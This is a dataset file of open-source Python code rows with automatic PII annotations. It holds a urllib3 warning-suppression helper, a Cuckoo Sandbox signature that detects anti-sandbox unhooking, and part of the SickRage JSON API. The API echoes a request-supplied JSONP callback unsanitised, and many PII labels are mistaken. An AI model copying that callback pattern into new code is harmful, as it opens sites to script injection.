x for x in devices) + + +def urllib3_disable_warnings(): + if 'requests' not in sys.modules: + import requests + else: + requests = sys.modules['requests'] + + # On latest Fedora, this is a symlink + if hasattr(requests, 'packages'): + requests.packages.urllib3.disable_warnings() # pylint: disable=maybe-no-member + else: + # But with python-requests-2.4.3-1.el7.noarch, we need + # to talk to urllib3 directly + have_urllib3 = False + try: + if 'urllib3' not in sys.modules: + import urllib3 + have_urllib3 = True + except ImportError: + pass + if have_urllib3: + # Except only call disable-warnings if it exists + if hasattr(urllib3, 'disable_warnings'): + urllib3.disable_warnings() +",8241,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'Alex Collins'], ['LOCATION', 'name.strip'], ['PERSON', 'json'], ['PERSON', 'separators='], ['PERSON', 'max'], ['PERSON', 'sevs'], ['PERSON', 'sev'], ['LOCATION', 'sevs'], ['PERSON', 'sev'], ['LOCATION', 'sevs'], ['PERSON', 'sev'], ['URL', 'template.fo'], ['LOCATION', 'sys.modules'], ['URL', 'sys.mo'], ['URL', 'requests.pa'], ['LOCATION', 'sys.modules'], ['URL', 'sys.mo'], ['URL', 'email.com'], ['URL', 'collections.na'], ['URL', 'sys.ve'], ['URL', 'repo.rs'], ['URL', 'docker.Client.im'], ['URL', 'docker.Cl'], ['URL', 'c.im'], ['URL', 'proc.com'], ['URL', 'proc.re'], ['URL', 'selinux.is'], ['URL', 'selinux.se'], ['URL', 'fd.re'], ['URL', 'name.st'], ['URL', 'context.st'], ['URL', 'sys.st'], ['URL', 'sys.st'], ['URL', 'template.fo'], ['URL', 'template.fo'], ['URL', 'summary.ke'], ['URL', 'res.ke'], ['URL', 'template.fo'], ['URL', 'summary.ke'], ['URL', 'template.fo'], ['URL', 'template.fo'], ['URL', 'template.fo'], ['URL', 'template.fo'], ['URL', 'template.fo'], ['URL', 'template.fo'], ['URL', 'sys.mo'], ['URL', 'python-requests-2.4.3-1.el7.no']]" +10,"# Copyright (C) 2014 Claudio ""nex"" Guarnieri (@botherder), Accuvant, Inc. (dummy@email.com) +# +# This program is free software: you can redistribute it and/or modify +# it under the terms of the GNU General Public License as published by +# the Free Software Foundation, either version 3 of the License, or +# (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program. If not, see . + +from lib.cuckoo.common.abstracts import Signature + +class Unhook(Signature): + name = ""antisandbox_unhook"" + description = ""Tries to unhook or modify Windows functions monitored by Cuckoo"" + severity = 3 + confidence = 60 + categories = [""anti-sandbox""] + authors = [""nex"",""Accuvant""] + minimum = ""1.2"" + evented = True + + filter_categories = set([""__notification__""]) + + def __init__(self, *args, **kwargs): + Signature.__init__(self, *args, **kwargs) + self.saw_unhook = False + self.unhook_info = set() + + def on_call(self, call, process): + subcategory = self.check_argument_call(call, + api=""__anomaly__"", + name=""Subcategory"", + pattern=""unhook"") + if subcategory: + self.saw_unhook = True + funcname = self.get_argument(call, ""FunctionName"") + if funcname != """": + if (funcname != ""SetUnhandledExceptionFilter"" and funcname != ""SetWindowsHookExW"" and funcname != ""UnhookWindowsHookEx"" and + funcname != ""CoCreateInstance"") or self.get_argument(call, ""UnhookType"") != ""modification"": + self.unhook_info.add(""function_name: "" + funcname + "", type: "" + self.get_argument(call, ""UnhookType"")) + + def on_complete(self): + if len(self.unhook_info) > 5: + weight = len(self.unhook_info) + confidence = 100 + + if not self.unhook_info: + self.saw_unhook = False + + for info in self.unhook_info: + self.data.append({""unhook"" : info }) + return self.saw_unhook +",2422,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2014'], ['PERSON', 'Claudio'], ['PERSON', 'Guarnieri'], ['PERSON', 'api=""__anomaly'], ['URL', 'http://www.gnu.org/licenses/'], ['URL', 'email.com'], ['URL', 'lib.cuckoo.com'], ['URL', 'self.sa'], ['URL', 'self.ch'], ['URL', 'self.sa'], ['URL', 'self.ge'], ['URL', 'self.ge'], ['URL', 'info.ad'], ['URL', 'self.ge'], ['URL', 'self.sa'], ['URL', 'self.sa']]" +11,"# coding=utf-8 +# Author: Dennis Lutter dummy@email.com +# Author: Jonathon Saine dummy@email.com +# URL: http://code.google.com/p/sickbeard/ +# +# This file is part of SickRage. +# +# SickRage is free software: you can redistribute it and/or modify +# it under the terms of the GNU General Public License as published by +# the Free Software Foundation, either version 3 of the License, or +# (at your option) any later version. +# +# SickRage is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with SickRage. If not, see . + +# TODO: break this up into separate files +# pylint: disable=C0301,C0302 +# pylint: disable=E1101,E0202,C0111,C0103 + +import io +import os +import re +import time +import urllib +import datetime +import traceback + +import sickbeard +from sickrage.helper.common import dateFormat, dateTimeFormat, pretty_file_size, sanitize_filename, timeFormat +from sickrage.helper.encoding import ek +from sickrage.helper.exceptions import CantUpdateShowException, ex, ShowDirectoryNotFoundException +from sickrage.helper.quality import get_quality_string +from sickrage.media.ShowFanArt import ShowFanArt +from sickrage.media.ShowNetworkLogo import ShowNetworkLogo +from sickrage.media.ShowPoster import ShowPoster +from sickrage.media.ShowBanner import ShowBanner +from sickrage.show.ComingEpisodes import ComingEpisodes +from sickrage.show.History import History +from sickrage.show.Show import Show +from sickrage.system.Restart import Restart +from sickrage.system.Shutdown import Shutdown +from sickbeard.versionChecker import CheckVersion +from sickbeard import db, logger, ui, helpers +from sickbeard import search_queue +from sickbeard import image_cache +from sickbeard import classes +from sickbeard import processTV +from sickbeard import network_timezones, sbdatetime +from sickbeard.common import DOWNLOADED +from sickbeard.common import FAILED +from sickbeard.common import IGNORED +from sickbeard.common import Overview +from sickbeard.common import Quality +from sickbeard.common import SKIPPED +from sickbeard.common import SNATCHED +from sickbeard.common import SNATCHED_PROPER +from sickbeard.common import UNAIRED +from sickbeard.common import UNKNOWN +from sickbeard.common import WANTED +from sickbeard.common import ARCHIVED +from sickbeard.common import statusStrings + +try: + import json +except ImportError: + # pylint: disable=F0401 + import simplejson as json + +# pylint: disable=F0401 +from tornado.web import RequestHandler + +indexer_ids = [""indexerid"", ""tvdbid""] + +RESULT_SUCCESS = 10 # only use inside the run methods +RESULT_FAILURE = 20 # only use inside the run methods +RESULT_TIMEOUT = 30 # not used yet :( +RESULT_ERROR = 40 # only use outside of the run methods ! +RESULT_FATAL = 50 # only use in Api.default() ! this is the ""we encountered an internal error"" error +RESULT_DENIED = 60 # only use in Api.default() ! this is the access denied error +result_type_map = { + RESULT_SUCCESS: ""success"", + RESULT_FAILURE: ""failure"", + RESULT_TIMEOUT: ""timeout"", + RESULT_ERROR: ""error"", + RESULT_FATAL: ""fatal"", + RESULT_DENIED: ""denied"", +} + + +# basically everything except RESULT_SUCCESS / success is bad + + +class ApiHandler(RequestHandler): + """""" api class that returns json results """""" + version = 5 # use an int since float-point is unpredictable + + def __init__(self, *args, **kwargs): + super(ApiHandler, self).__init__(*args, **kwargs) + + # def set_default_headers(self): + # self.set_header('Cache-Control', 'no-store, no-cache, must-revalidate, max-age=0') + + def get(self, *args, **kwargs): + kwargs = self.request.arguments + for arg, value in kwargs.iteritems(): + if len(value) == 1: + kwargs[arg] = value[0] + + args = args[1:] + + # set the output callback + # default json + output_callback_dict = { + 'default': self._out_as_json, + 'image': self._out_as_image, + } + + access_msg = u""API :: "" + self.request.remote_ip + "" - gave correct API KEY. ACCESS GRANTED"" + logger.log(access_msg, logger.DEBUG) + + # set the original call_dispatcher as the local _call_dispatcher + _call_dispatcher = self.call_dispatcher + # if profile was set wrap ""_call_dispatcher"" in the profile function + if 'profile' in kwargs: + from profilehooks import profile + + _call_dispatcher = profile(_call_dispatcher, immediate=True) + del kwargs[""profile""] + + try: + out_dict = _call_dispatcher(args, kwargs) + except Exception, e: # real internal error oohhh nooo :( + logger.log(u""API :: "" + ex(e), logger.ERROR) + error_data = { + ""error_msg"": ex(e), + ""args"": args, + ""kwargs"": kwargs + } + out_dict = _responds(RESULT_FATAL, error_data, + ""SickRage encountered an internal error! Please report to the Devs"") + + if 'outputType' in out_dict: + output_callback = output_callback_dict[out_dict['outputType']] + else: + output_callback = output_callback_dict['default'] + + try: + self.finish(output_callback(out_dict)) + except Exception: + pass + + def _out_as_image(self, _dict): + self.set_header('Content-Type', _dict['image'].get_media_type()) + return _dict['image'].get_media() + + def _out_as_json(self, _dict): + self.set_header(""Content-Type"", ""application/json;charset=UTF-8"") + try: + out = json.dumps(_dict, ensure_ascii=False, sort_keys=True) + callback = self.get_query_argument('callback', None) or self.get_query_argument('jsonp', None) + if callback: + out = callback + '(' + out + ');' # wrap with JSONP call if requested + except Exception, e: # if we fail to generate the output fake an error + logger.log(u""API :: "" + traceback.format_exc(), logger.DEBUG) + out = '{""result"": ""%s"", ""message"": ""error while composing output: %s""}' % \ + (result_type_map[RESULT_ERROR], ex(e)) + return out + + def call_dispatcher(self, args, kwargs): + """""" calls the appropriate CMD class + looks for a cmd in args and kwargs + or calls the TVDBShorthandWrapper when the first args element is a number + or returns an error that there is no such cmd + """""" + logger.log(u""API :: all args: '"" + str(args) + ""'"", logger.DEBUG) + logger.log(u""API :: all kwargs: '"" + str(kwargs) + ""'"", logger.DEBUG) + + commands = None + if args: + commands, args = args[0], args[1:] + commands = kwargs.pop(""cmd"", commands) + + out_dict = {} + if commands: + commands = commands.split(""|"") + multi_commands = len(commands) > 1 + for cmd in commands: + cur_args, cur_kwargs = self.filter_params(cmd, args, kwargs) + + if len(cmd.split(""_"")) > 1: + cmd, cmd_index = cmd.split(""_"") + + logger.log(u""API :: "" + cmd + "": cur_kwargs "" + str(cur_kwargs), logger.DEBUG) + if not (cmd in ('show.getbanner', 'show.getfanart', 'show.getnetworklogo', 'show.getposter') and + multi_commands): # skip these cmd while chaining + try: + if cmd in function_mapper: + func = function_mapper.get(cmd) # map function + func.rh = self # add request handler to function + cur_out_dict = func(cur_args, cur_kwargs).run() # call function and get response + elif _is_int(cmd): + cur_out_dict = TVDBShorthandWrapper(cur_args, cur_kwargs, cmd).run() + else: + cur_out_dict = _responds(RESULT_ERROR, ""No such cmd: '"" + cmd + ""'"") + except ApiError as error: # Api errors that we raised, they are harmless + cur_out_dict = _responds(RESULT_ERROR, msg=ex(error)) + else: # if someone chained one of the forbidden commands they will get an error for this one cmd + cur_out_dict = _responds(RESULT_ERROR, msg=""The cmd '"" + cmd + ""' is not supported while chaining"") + + if multi_commands: + # note: if duplicate commands are issued and one has an index defined it will override + # all others or the other way around, depending on the command order + # THIS IS NOT A BUG! + if cmd_index: # do we need an index dict for this cmd ? + if cmd not in out_dict: + out_dict[cmd] = {} + out_dict[cmd][cmd_index] = cur_out_dict + else: + out_dict[cmd] = cur_out_dict + else: + out_dict = cur_out_dict + + if multi_commands: # if we had multiple commands we have to wrap it in a response dict + out_dict = _responds(RESULT_SUCCESS, out_dict) + else: # index / no cmd given + out_dict = CMD_SickBeard(args, kwargs).run() + + return out_dict + + def filter_params(self, cmd, args, kwargs): + """""" return only params kwargs that are for cmd + and rename them to a clean version (remove ""_"") + args are shared across all commands + + all args and kwargs are lowered + + cmd are separated by ""|"" e.g. &cmd=shows|future + kwargs are name-spaced with ""."" e.g. show.indexerid=101501 + if a kwarg has no namespace asking it anyways (global) + + full e.g. + /api?apikey=1234&cmd=show.seasonlist_asd|show.seasonlist_2&show.seasonlist_asd.indexerid=101501&show.seasonlist_2.indexerid=79488&sort=asc + + two calls of show.seasonlist + one has the index ""asd"" the other one ""2"" + the ""indexerid"" kwargs / params have the indexed cmd as a namespace + and the kwarg / param ""sort"" is a used as a global + """""" + cur_args = [] + for arg in args: + cur_args.append(arg.lower()) + cur_args = tuple(cur_args) + + cur_kwargs = {} + for kwarg in kwargs: + if kwarg.find(cmd + ""."") == 0: + clean_key = kwarg.rpartition(""."")[2] + cur_kwargs[clean_key] = kwargs[kwarg].lower() + elif ""."" not in kwarg: # the kwarg was not name-spaced therefore a ""global"" + cur_kwargs[kwarg] = kwargs[kwarg] + return cur_args, cur_kwargs + + +class ApiCall(ApiHandler): + + _help = {""desc"": ""This command is not documented. Please report this to the developers.""} + + def __init__(self, args, kwargs): + # missing + try: + if self._missing: + self.run = self.return_missing + except AttributeError: + pass + + # help + if 'help' in kwargs: + self.run = self.return_help + + def run(self): + # override with real output function in subclass + return {} + + def return_help(self): + try: + if self._requiredParams: + pass + except AttributeError: + self._requiredParams = [] + try: + if self._optionalParams: + pass + except AttributeError: + self._optionalParams = [] + + for paramDict, paramType in [(self._requiredParams, ""requiredParameters""), + (self._optionalParams, ""optionalParameters"")]: + + if paramType in self._help: + for paramName in paramDict: + if paramName not in self._help[paramType]: + self._help[paramType][paramName] = {} + if paramDict[paramName][""allowed_values""]: + self._help[paramType][paramName][""allowed_values""] = paramDict[paramName][""allowed_values""] + else: + self._help[paramType][paramName][""allowed_values""] = ""see desc"" + self._help[paramType][paramName][""defaultValue""] = paramDict[paramName][""defaultValue""] + self._help[paramType][paramName][""type""] = paramDict[paramName][""type""] + + elif paramDict: + for paramName in paramDict: + self._help[paramType] = {} + self._help[paramType][paramName] = paramDict[paramName] + else: + self._help[paramType] = {} + msg = ""No description available"" + if ""desc"" in self._help: + msg = self._help[""desc""] + return _responds(RESULT_SUCCESS, self._help, msg) + + def return_missing(self): + if len(self._missing) == 1: + msg = ""The required parameter: '"" + self._missing[0] + ""' was not set"" + else: + msg = ""The required parameters: '"" + ""','"".join(self._missing) + ""' where not set"" + return _responds(RESULT_ERROR, msg=msg) + + def check_params(self, args, kwargs, key, default, required, arg_type, allowed_values): + + """""" function to check passed params for the shorthand wrapper + and to detect missing/required params + """""" + + # auto-select indexer + if key in indexer_ids: + if ""tvdbid"" in kwargs: + key = ""tvdbid"" + + self.indexer = indexer_ids.index(key) + + missing = True + org_default = default + + if arg_type == ""bool"": + allowed_values = [0, 1] + + if args: + default = args[0] + missing = False + args = args[1:] + if kwargs.get(key): + default = kwargs.get(key) + missing = False + if required: + try: + self._missing + self._requiredParams.append(key) + except AttributeError: + self._missing = [] + self._requiredParams = {key: {""allowed_values"": allowed_values, + ""defaultValue"": org_default, + ""type"": arg_type}} + + if missing and key not in self._missing: + self._missing.append(key) + else: + try: + self._optionalParams[key] = {""allowed_values"": allowed_values, + ""defaultValue"": org_default, + ""type"": arg_type} + except AttributeError: + self._optionalParams = {key: {""allowed_values"": allowed_values, + ""defaultValue"": org_default, + ""type"": arg_type}} + + if default: + default = self._check_param_type(default, key, arg_type) + if arg_type == ""bool"": + arg_type = [] + self._check_param_value(default, key, allowed_values) + + return default, args + + def _check_param_type(self, value, name, arg_type): + """""" checks if value can be converted / parsed to arg_type + will raise an error on failure + or will convert it to arg_type and return new converted value + can check for: + - int: will be converted into int + - bool: will be converted to False / True + - list: will always return a list + - string: will do nothing for now + - ignore: will ignore it, just like ""string"" + """""" + error = False + if arg_type == ""int"": + if _is_int(value): + value = int(value) + else: + error = True + elif arg_type == ""bool"": + if value in (""0"", ""1""): + value = bool(int(value)) + elif value in (""true"", ""True"", ""TRUE""): + value = True + elif value in (""false"", ""False"", ""FALSE""): + value = False + elif value not in (True, False): + error = True + elif arg_type == ""list"": + value = value.split(""|"") + elif arg_type == ""string"": + pass + elif arg_type == ""ignore"": + pass + else: + logger.log(u'API :: Invalid param type: ""%s"" can not be checked. Ignoring it.' % str(arg_type), logger.ERROR) + + if error: + # this is a real ApiError !! + raise ApiError(u'param ""%s"" with given value ""%s"" could not be parsed into ""%s""' + % (str(name), str(value), str(arg_type))) + + return value + + def _check_param_value(self, value, name, allowed_values): + """""" will check if value (or all values in it ) are in allowed values + will raise an exception if value is ""out of range"" + if bool(allowed_value) is False a check is not performed and all values are excepted + """""" + if allowed_values: + error = False + if isinstance(value, list): + for item in value: + if item not in allowed_values: + error = True + else: + if value not in allowed_values: + error = True + + if error: + # this is kinda a ApiError but raising an error is the only way of quitting here + raise ApiError(u""param: '"" + str(name) + ""' with given value: '"" + str( + value) + ""' is out of allowed range '"" + str(allowed_values) + ""'"") + + +class TVDBShorthandWrapper(ApiCall): + _help = {""desc"": ""This is an internal function wrapper. Call the help command directly for more information.""} + + def __init__(self, args, kwargs, sid): + self.origArgs = args + self.kwargs = kwargs + self.sid = sid + + self.s, args = self.check_params(args, kwargs, ""s"", None, False, ""ignore"", []) + self.e, args = self.check_params(args, kwargs, ""e"", None, False, ""ignore"", []) + self.args = args + + ApiCall.__init__(self, args, kwargs) + + def run(self): + """""" internal function wrapper """""" + args = (self.sid,) + self.origArgs + if self.e: + return CMD_Episode(args, self.kwargs).run() + elif self.s: + return CMD_ShowSeasons(args, self.kwargs).run() + else: + return CMD_Show(args, self.kwargs).run() + + +# ############################### +# helper functions # +# ############################### + +def _is_int(data): + try: + int(data) + except (TypeError, ValueError, OverflowError): + return False + else: + return True + + +def _rename_element(dict_obj, old_key, new_key): + try: + dict_obj[new_key] = dict_obj[old_key] + del dict_obj[old_key] + except (ValueError, TypeError, NameError): + pass + return dict_obj + + +def _responds(result_type, data=None, msg=""""): + """""" + result is a string of given ""type"" (success/failure/timeout/error) + message is a human readable string, can be empty + data is either a dict or a array, can be a empty dict or empty array + """""" + return {""result"": result_type_map[result_type], + ""message"": msg, + ""data"": {} if not data else data} + + +def _get_status_strings(s): + return statusStrings[s] + + +def _ordinal_to_datetime_form(ordinal): + # workaround for episodes with no air date + if int(ordinal) != 1: + date = datetime.date.fromordinal(ordinal) + else: + return """" + return date.strftime(dateTimeFormat) + + +def _ordinal_to_date_form(ordinal): + if int(ordinal) != 1: + date = datetime.date.fromordinal(ordinal) + else: + return """" + return date.strftime(dateFormat) + + +def _history_date_to_datetime_form(time_string): + date = datetime.datetime.strptime(time_string, History.date_format) + return date.strftime(dateTimeFormat) + + +def _map_quality(show_obj): + quality_map = _get_quality_map() + + any_qualities = [] + best_qualities = [] + + i_quality_id, a_quality_id = Quality.splitQuality(int(show_obj)) + if i_quality_id: + for quality in i_quality_id: + any_qualities.append(quality_map[quality]) + if a_quality_id: + for quality in a_quality_id: + best_qualities.append(quality_map[quality]) + return any_qualities, best_qualities + + +def _get_quality_map(): + return {Quality.SDTV: 'sdtv', + Quality.SDDVD: 'sddvd', + Quality.HDTV: 'hdtv', + Quality.RAWHDTV: 'rawhdtv', + Quality.FULLHDTV: 'fullhdtv', + Quality.HDWEBDL: 'hdwebdl', + Quality.FULLHDWEBDL: 'fullhdwebdl', + Quality.HDBLURAY: 'hdbluray', + Quality.FULLHDBLURAY: 'fullhdbluray', + Quality.UNKNOWN: 'unknown'} + + +def _get_root_dirs(): + if sickbeard.ROOT_DIRS == """": + return {} + + root_dir = {} + root_dirs = sickbeard.ROOT_DIRS.split('|') + default_index = int(sickbeard.ROOT_DIRS.split('|')[0]) + + root_dir[""default_index""] = int(sickbeard.ROOT_DIRS.split('|')[0]) + # remove default_index value from list (this fixes the offset) + root_dirs.pop(0) + + if len(root_dirs) < default_index: + return {} + + # clean up the list - replace %xx escapes by their single-character equivalent + root_dirs = [urllib.unquote_plus(x) for x in root_dirs] + + default_dir = root_dirs[default_index] + + dir_list = [] + for root_dir in root_dirs: + valid = 1 + try: + ek(os.listdir, root_dir) + except Exception: + valid = 0 + default = 0 + if root_dir is default_dir: + default = 1 + + cur_dir = { + 'valid': valid, + 'location': root_dir, + 'default': default + } + dir_list.append(cur_dir) + + return dir_list + + +class ApiError(Exception): + """""" + Generic API error + """""" + + +class IntParseError(Exception): + """""" + A value could not be parsed into an int, but should be parse-able to an int + """""" + + +# -------------------------------------------------------------------------------------# + + +class CMD_Help(ApiCall): + _help = { + ""desc"": ""Get help about a given command"", + ""optionalParameters"": { + ""subject"": {""desc"": ""The name of the command to get the help of""}, + } + } + + def __init__(self, args, kwargs): + # required + # optional + self.subject, args = self.check_params(args, kwargs, ""subject"", ""help"", False, ""string"", function_mapper.keys()) + ApiCall.__init__(self, args, kwargs) + + def run(self): + """""" Get help about a given command """""" + if self.subject in function_mapper: + out = _responds(RESULT_SUCCESS, function_mapper.get(self.subject)((), {""help"": 1}).run()) + else: + out = _responds(RESULT_FAILURE, msg=""No such cmd"") + return out + + +class CMD_ComingEpisodes(ApiCall): + _help = { + ""desc"": ""Get the coming episodes"", + ""optionalParameters"": { + ""sort"": {""desc"": ""Change the sort order""}, + ""type"": {""desc"": ""One or more categories of coming episodes, separated by |""}, + ""paused"": { + ""desc"": ""0 to exclude paused shows, 1 to include them, or omitted to use SickRage default value"" + }, + } + } + + def __init__(self, args, kwargs): + # required + # optional + self.sort, args = self.check_params(args, kwargs, ""sort"", ""date"", False, ""string"", ComingEpisodes.sorts.keys()) + self.type, args = self.check_params(args, kwargs, ""type"", '|'.join(ComingEpisodes.categories), False, ""list"", + ComingEpisodes.categories) + self.paused, args = self.check_params(args, kwargs, ""paused"", bool(sickbeard.COMING_EPS_DISPLAY_PAUSED), False, + ""bool"", []) + # super, missing, help + ApiCall.__init__(self, args, kwargs) + + def run(self): + """""" Get the coming episodes """""" + grouped_coming_episodes = ComingEpisodes.get_coming_episodes(self.type, self.sort, True, self.paused) + data = {section: [] for section in grouped_coming_episodes.keys()} + + for section, coming_episodes in grouped_coming_episodes.iteritems(): + for coming_episode in coming_episodes: + data[section].append({ + 'airdate': coming_episode['airdate'], + 'airs': coming_episode['airs'], + 'ep_name': coming_episode['name'], + 'ep_plot': coming_episode['description'], + 'episode': coming_episode['episode'], + 'indexerid': coming_episode['indexer_id'], + 'network': coming_episode['network'], + 'paused': coming_episode['paused'], + 'quality': coming_episode['quality'], + 'season': coming_episode['season'], + 'show_name': coming_episode['show_name'], + 'show_status': coming_episode['status'], + 'tvdbid': coming_episode['tvdbid'], + 'weekday': coming_episode['weekday'] + }) + + return _responds(RESULT_SUCCESS, data) + + +class CMD_Episode(ApiCall): + _help = { + ""desc"": ""Get detailed information about an episode"", + ""requiredParameters"": { + ""indexerid"": {""desc"": ""Unique ID of a show""}, + ""season"": {""desc"": ""The season number""}, + ""episode"": {""desc"": ""The episode number""}, + }, + ""optionalParameters"": { + ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""}, + ""full_path"": { + ""desc"": ""Return the full absolute show location (if valid, and True), or the relative show location"" + }, + } + } + + def __init__(self, args, kwargs): + # required + self.indexerid, args = self.check_params(args, kwargs, ""indexerid"", None, True, ""int"", []) + self.s, args = self.check_params(args, kwargs, ""season"", None, True, ""int"", []) + self.e, args = self.check_params(args, kwargs, ""episode"", None, True, ""int"", []) + # optional + self.fullPath, args = self.check_params(args, kwargs, ""full_path"", False, False, ""bool"", []) + # super, missing, help + ApiCall.__init__(self, args, kwargs) + + def run(self): + """""" Get detailed information about an episode """""" + show_obj = Show.find(sickbeard.showList, int(self.indexerid)) + if not show_obj: + return _responds(RESULT_FAILURE, msg=""Show not found"") + + my_db = db.DBConnection(row_type=""dict"") + sql_results = my_db.select( + ""SELECT name, description, airdate, status, location, file_size, release_name, subtitles FROM tv_episodes WHERE showid = ? AND episode = ? AND season = ?"", + [self.indexerid, self.e, self.s]) + if not len(sql_results) == 1: + raise ApiError(""Episode not found"") + episode = sql_results[0] + # handle path options + # absolute vs relative vs broken + show_path = None + try: + show_path = show_obj.location + except ShowDirectoryNotFoundException: + pass + + if not show_path: # show dir is broken ... episode path will be empty + episode[""location""] = """" + elif not self.fullPath: + # using the length because lstrip() removes to much + show_path_length = len(show_path) + 1 # the / or \ yeah not that nice i know + episode[""location""] = episode[""location""][show_path_length:] + + # convert stuff to human form + if helpers.tryInt(episode['airdate'], 1) > 693595: # 1900 + episode['airdate'] = sbdatetime.sbdatetime.sbfdate(sbdatetime.sbdatetime.convert_to_setting( + network_timezones.parse_date_time(int(episode['airdate']), show_obj.airs, show_obj.network)), d_preset=dateFormat) + else: + episode['airdate'] = 'Never' + + status, quality = Quality.splitCompositeStatus(int(episode[""status""])) + episode[""status""] = _get_status_strings(status) + episode[""quality""] = get_quality_string(quality) + episode[""file_size_human""] = pretty_file_size(episode[""file_size""]) + + return _responds(RESULT_SUCCESS, episode) + + +class CMD_EpisodeSearch(ApiCall): + _help = { + ""desc"": ""Search for an episode. The response might take some time."", + ""requiredParameters"": { + ""indexerid"": {""desc"": ""Unique ID of a show""}, + ""season"": {""desc"": ""The season number""}, + ""episode"": {""desc"": ""The episode number""}, + }, + ""optionalParameters"": { + ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""}, + } + } + + def __init__(self, args, kwargs): + # required + self.indexerid, args = self.check_params(args, kwargs, ""indexerid"", None, True, ""int"", []) + self.s, args = self.check_params(args, kwargs, ""season"", None, True, ""int"", []) + self.e, args = self.check_params(args, kwargs, ""episode"", None, True, ""int"", []) + # optional + # super, missing, help + ApiCall.__init__(self, args, kwargs) + + def run(self): + """""" Search for an episode """""" + show_obj = Show.find(sickbeard.showList, int(self.indexerid)) + if not show_obj: + return _responds(RESULT_FAILURE, msg=""Show not found"") + + # retrieve the episode object and fail if we can't get one + ep_obj = show_obj.getEpisode(int(self.s), int(self.e)) + if isinstance(ep_obj, str): + return _responds(RESULT_FAILURE, msg=""Episode not found"") + + # make a queue item for it and put it on the queue + ep_queue_item = search_queue.ManualSearchQueueItem(show_obj, ep_obj) + sickbeard.searchQueueScheduler.action.add_item(ep_queue_item) # @UndefinedVariable + + # wait until the queue item tells us whether it worked or not + while ep_queue_item.success is None: # @UndefinedVariable + time.sleep(1) + + # return the correct json value + if ep_queue_item.success: + status, quality = Quality.splitCompositeStatus(ep_obj.status) # @UnusedVariable + # TODO: split quality and status? + return _responds(RESULT_SUCCESS, {""quality"": get_quality_string(quality)}, + ""Snatched ("" + get_quality_string(quality) + "")"") + + return _responds(RESULT_FAILURE, msg='Unable to find episode') + + +class CMD_EpisodeSetStatus(ApiCall): + _help = { + ""desc"": ""Set the status of an episode or a season (when no episode is provided)"", + ""requiredParameters"": { + ""indexerid"": {""desc"": ""Unique ID of a show""}, + ""season"": {""desc"": ""The season number""}, + ""status"": {""desc"": ""The status of the episode or season""} + }, + ""optionalParameters"": { + ""episode"": {""desc"": ""The episode number""}, + ""force"": {""desc"": ""True to replace existing downloaded episode or season, False otherwise""}, + ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""}, + } + } + + def __init__(self, args, kwargs): + # required + self.indexerid, args = self.check_params(args, kwargs, ""indexerid"", None, True, ""int"", []) + self.s, args = self.check_params(args, kwargs, ""season"", None, True, ""int"", []) + self.status, args = self.check_params(args, kwargs, ""status"", None, True, ""string"", + [""wanted"", ""skipped"", ""ignored"", ""failed""]) + # optional + self.e, args = self.check_params(args, kwargs, ""episode"", None, False, ""int"", []) + self.force, args = self.check_params(args, kwargs, ""force"", False, False, ""bool"", []) + # super, missing, help + ApiCall.__init__(self, args, kwargs) + + def run(self): + """""" Set the status of an episode or a season (when no episode is provided) """""" + show_obj = Show.find(sickbeard.showList, int(self.indexerid)) + if not show_obj: + return _responds(RESULT_FAILURE, msg=""Show not found"") + + # convert the string status to a int + for status in statusStrings: + if str(statusStrings[status]).lower() == str(self.status).lower(): + self.status = status + break + else: # if we don't break out of the for loop we got here. + # the allowed values has at least one item that could not be matched against the internal status strings + raise ApiError(""The status string could not be matched to a status. Report to Devs!"") + + ep_list = [] + if self.e: + ep_obj = show_obj.getEpisode(self.s, self.e) + if not ep_obj: + return _responds(RESULT_FAILURE, msg=""Episode not found"") + ep_list = [ep_obj] + else: + # get all episode numbers from self, season + ep_list = show_obj.getAllEpisodes(season=self.s) + + def _ep_result(result_code, ep, msg=""""): + return {'season': ep.season, 'episode': ep.episode, 'status': _get_status_strings(ep.status), + 'result': result_type_map[result_code], 'message': msg} + + ep_results = [] + failure = False + start_backlog = False + segments = {} + + sql_l = [] + for ep_obj in ep_list: + with ep_obj.lock: + if self.status == WANTED: + # figure out what episodes are wanted so we can backlog them + if ep_obj.season in segments: + segments[ep_obj.season].append(ep_obj) + else: + segments[ep_obj.season] = [ep_obj] + + # don't let them mess up UN-AIRED episodes + if ep_obj.status == UNAIRED: + if self.e is not None: # setting the status of an un-aired is only considered a failure if we directly wanted this episode, but is ignored on a season request + ep_results.append( + _ep_result(RESULT_FAILURE, ep_obj, ""Refusing to change status because it is UN-AIRED"")) + failure = True + continue + + if self.status == FAILED and not sickbeard.USE_FAILED_DOWNLOADS: + ep_results.append(_ep_result(RESULT_FAILURE, ep_obj, ""Refusing to change status to FAILED because failed download handling is disabled"")) + failure = True + continue + + # allow the user to force setting the status for an already downloaded episode + if ep_obj.status in Quality.DOWNLOADED + Quality.ARCHIVED and not self.force: + ep_results.append(_ep_result(RESULT_FAILURE, ep_obj, ""Refusing to change status because it is already marked as DOWNLOADED"")) + failure = True + continue + + ep_obj.status = self.status + sql_l.append(ep_obj.get_sql()) + + if self.status == WANTED: + start_backlog = True + ep_results.append(_ep_result(RESULT_SUCCESS, ep_obj)) + + if len(sql_l) > 0: + my_db = db.DBConnection() + my_db.mass_action(sql_l) + + extra_msg = """" + if start_backlog: + for season, segment in segments.iteritems(): + cur_backlog_queue_item = search_queue.BacklogQueueItem(show_obj, segment) + sickbeard.searchQueueScheduler.action.add_item(cur_backlog_queue_item) # @UndefinedVariable + + logger.log(u""API :: Starting backlog for "" + show_obj.name + "" season "" + str( + season) + "" because some episodes were set to WANTED"") + + extra_msg = "" Backlog started"" + + if failure: + return _responds(RESULT_FAILURE, ep_results, 'Failed to set all or some status. Check data.' + extra_msg) + else: + return _responds(RESULT_SUCCESS, msg='All status set successfully.' + extra_msg) + + +class CMD_SubtitleSearch(ApiCall): + _help = { + ""desc"": ""Search 